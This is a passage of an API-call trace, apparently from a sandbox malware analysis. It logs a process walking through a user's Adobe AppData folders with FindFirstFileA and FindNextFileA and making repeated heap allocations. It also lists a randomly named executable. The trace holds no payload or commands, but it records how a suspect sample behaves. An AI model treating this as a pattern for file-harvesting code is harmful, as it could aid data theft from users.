Size=0x20) returned 0x41e3a8 [0135.471] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd680 [0135.471] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401d10 [0135.471] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.471] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd98f0400, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xd98f0400, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xdda7b600, ftLastWriteTime.dwHighDateTime=0x1d6d589, nFileSizeHigh=0x0, nFileSizeLow=0xd1800, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="OqRoSnESYXcDITEx.exe", cAlternateFileName="OQROSN~1.EXE")) returned 0 [0135.471] FindClose (in: hFindFile=0x91489b8 | out: hFindFile=0x91489b8) returned 1 [0135.471] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0135.471] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0135.471] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.471] FindNextFileA (in: hFindFile=0x9148978, lpFindFileData=0x36ec70 | out: lpFindFileData=0x36ec70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489b8, dwReserved1=0x13d180a, cFileName="Adobe", cAlternateFileName="")) returned 1 [0135.471] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174ec8 [0135.471] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x47) returned 0x9150688 [0135.471] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174ec8 | out: hHeap=0x3f0000) returned 1 [0135.471] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.471] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x91489b8 [0135.472] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437310 | out: hHeap=0x3f0000) returned 1 [0135.472] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.472] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0135.472] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.472] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.472] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x91489f8 [0135.472] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.472] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.473] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="10.0", cAlternateFileName="")) returned 1 [0135.473] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.473] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.473] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148a38 [0135.474] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.474] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.474] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x892c, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="AdobeCMapFnt10.lst", cAlternateFileName="ADOBEC~1.LST")) returned 1 [0135.474] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e3a8 [0135.474] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0135.474] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.474] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0135.474] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xd9c071a0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x21cdb, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="AdobeSysFnt10.lst", cAlternateFileName="ADOBES~1.LST")) returned 1 [0135.474] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0135.474] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd680 [0135.474] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0135.474] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.474] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="Cache", cAlternateFileName="")) returned 1 [0135.474] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0135.474] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5f) returned 0x4cd6e8 [0135.474] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0135.475] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.475] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9148a78 [0135.540] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.540] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0135.540] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xcfc4, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="AcroFnt10.lst", cAlternateFileName="ACROFN~1.LST")) returned 1 [0135.540] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.540] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x77) returned 0x45b3f0 [0135.540] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.540] FindNextFileA (in: hFindFile=0x9148a78, lpFindFileData=0x36e390 | out: lpFindFileData=0x36e390*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xcfc4, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="AcroFnt10.lst", cAlternateFileName="ACROFN~1.LST")) returned 0 [0135.540] FindClose (in: hFindFile=0x9148a78 | out: hFindFile=0x9148a78) returned 1 [0135.540] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b3f0 | out: hHeap=0x3f0000) returned 1 [0135.540] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.540] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd3b286a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd3b286a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xee0c3750, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="SharedDataEvents", cAlternateFileName="SHARED~1")) returned 1 [0135.540] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0135.540] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5f) returned 0x4cd6e8 [0135.540] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0135.540] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.540] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 1 [0135.540] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127c30 [0135.540] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5f) returned 0x4cd680 [0135.540] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127c30 | out: hHeap=0x3f0000) returned 1 [0135.540] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.541] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 0 [0135.541] FindClose (in: hFindFile=0x9148a38 | out: hFindFile=0x9148a38) returned 1 [0135.541] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd680 | out: hHeap=0x3f0000) returned 1 [0135.541] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e3a8 | out: hHeap=0x3f0000) returned 1 [0135.541] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.541] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="10.0", cAlternateFileName="")) returned 0 [0135.542] FindClose (in: hFindFile=0x91489f8 | out: hFindFile=0x91489f8) returned 1 [0135.542] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x437310 | out: hHeap=0x3f0000) returned 1 [0135.543] FindNextFileA (in: hFindFile=0x91489b8, lpFindFileData=0x36ea38 | out: lpFindFileData=0x36ea38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x91489f8, dwReserved1=0x13d180a, cFileName="Color", cAlternateFileName="")) returned 1 [0135.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x437310 [0135.543] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.543] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x91489f8 [0135.545] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.545] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0135.545] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce719dc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x49c, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="ACECache11.lst", cAlternateFileName="ACECAC~1.LST")) returned 1 [0135.545] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.545] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5f) returned 0x4cd680 [0135.545] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.545] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="Profiles", cAlternateFileName="")) returned 1 [0135.545] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0135.545] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x5f) returned 0x4cd6e8 [0135.545] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0135.545] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.545] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName=".", cAlternateFileName="")) returned 0x9148a38 [0135.546] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.546] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="..", cAlternateFileName="")) returned 1 [0135.546] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x102a0, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="wscRGB.icc", cAlternateFileName="")) returned 1 [0135.546] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0135.546] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0xa74, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="wsRGB.icc", cAlternateFileName="")) returned 1 [0135.546] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x9144638 [0135.546] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0135.546] FindNextFileA (in: hFindFile=0x9148a38, lpFindFileData=0x36e5c8 | out: lpFindFileData=0x36e5c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0xa74, dwReserved0=0x9148a78, dwReserved1=0x13d180a, cFileName="wsRGB.icc", cAlternateFileName="")) returned 0 [0135.546] FindClose (in: hFindFile=0x9148a38 | out: hFindFile=0x9148a38) returned 1 [0135.546] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9144638 | out: hHeap=0x3f0000) returned 1 [0135.546] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.546] FindNextFileA (in: hFindFile=0x91489f8, lpFindFileData=0x36e800 | out: lpFindFileData=0x36e800*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9148a38, dwReserved1=0x13d180a, cFileName="Profiles", cAlternateFileName="")) returned 0 [0135.546] FindClose (in: hFindFile=0x91489f8 | out: hFindFile=0x91489f8) returned 1 